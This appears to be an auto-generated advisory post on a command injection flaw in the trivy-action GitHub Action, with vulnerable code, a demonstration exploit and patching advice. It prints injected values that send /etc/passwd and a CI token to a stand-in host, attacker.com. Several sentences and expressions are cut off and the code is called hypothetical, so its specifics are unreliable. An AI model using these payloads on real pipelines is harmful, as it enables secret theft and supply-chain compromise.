Listen to this Post
A command injection vulnerability exists in the `aquasecurity/trivy-action` (versions 0.31.0 through 0.33.1) due to the unsafe handling of user-controlled inputs when exporting environment variables. The action utilizes a shell script (entrypoint.sh) that sources a dynamically generated file named trivy_envs.txt. Prior to sourcing, the action writes lines in the format `export VAR_NAME=$(...), backticks, or ;—into any action input that gets written to this file (e.g., the `output` or `scan-ref` parameters), those commands will be executed by the shell when the `source` command reads the file. This allows an attacker to execute arbitrary code within the context of the GitHub Actions runner, potentially compromising the CI/CD pipeline and its secrets. A practical attack vector involves injecting malicious syntax into a Pull Request , which is then passed as an action input via context expressions like ${{ github.event.pull_request. }}.
dailycve form:
Platform: GitHub Actions
Version: 0.31.0-0.33.1
Vulnerability : OS Command Injection
Severity: Moderate (CVSS 6.8)
date: 2026-02-18
Prediction: Patch expected by 2026-02-25
What Undercode Say:
Analytics:
The vulnerability exists at the intersection of GitHub Actions context injection and insecure shell script practices. The action fails to neutralize special elements used in an OS command (CWE-78). The attack surface is significant because many workflows automatically incorporate PR metadata into job parameters. The `source ./trivy_envs.txt` command in `entrypoint.sh` is the point of execution, and the `set_env_var_if_provided` function in `action.yaml` is the point of injection.
Bash Commands & Code:
View the vulnerable commit (hypothetical example)
git show 7aca5ac:action.yaml
The vulnerable code pattern in action.yaml (Line 188 - conceptual)
set_env_var_if_provided() {
if [ -n "$2" ]; then
echo "export $1=$2" >> trivy_envs.txt
fi
}
The vulnerable sourcing in entrypoint.sh (Line 9)
if [ -f trivy_envs.txt ]; then
source ./trivy_envs.txt
fi
Demonstration of the malicious PR exploit
Attacker sets PR to: "test"; curl -X POST -d @/etc/passwd attacker.com/steal; "
This results in a line in trivy_envs.txt like:
export OUTPUT="test"; curl -X POST -d @/etc/passwd attacker.com/steal; .sarif"
Manual simulation of the vulnerability
echo 'export MALICIOUS="$(id > /tmp/pwned)"' > trivy_envs.txt
source ./trivy_envs.txt
cat /tmp/pwned Shows command execution occurred
How Exploit:
An attacker submits a Pull Request containing a malicious or branch name. The GitHub Actions workflow uses this value as an input to the Trivy action (e.g., with: output: "trivy-${{ github.event.pull_request. }}.sarif"). The action writes the unescaped string containing shell metacharacters to trivy_envs.txt. When `entrypoint.sh` sources the file, the shell interprets the injected command (e.g., $(curl attacker.com?token=$ACTIONS_ID_TOKEN_REQUEST_TOKEN)) and executes it on the runner.
Protection from this CVE:
- Immediate Patching: Upgrade `aquasecurity/trivy-action` to version `0.34.0` or later, where the issue is fixed with proper escaping or a different mechanism for handling variables.
- Input Sanitization: If patching is impossible, avoid using unsanitized, attacker-controllable context expressions (like
github.event.pull_request.,github.head_ref) in any action input. - Workflow Hardening: Implement strict permissions for `GITHUB_TOKEN` and consider using OpenID Connect (OIDC) with conditional access to limit the blast radius of a compromised runner.
- Code Audit: Review custom actions for similar patterns of writing to files that are later sourced by a shell.
Impact:
Successful exploitation leads to arbitrary command execution within the GitHub Actions runner. This can result in the exfiltration of secrets (e.g., ACTIONS_ID_TOKEN_REQUEST_TOKEN, repository secrets), unauthorized code modifications, or supply chain attacks by poisoning build artifacts. Since the runner often has write access to the repository, an attacker could potentially push malicious code or alter release assets.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

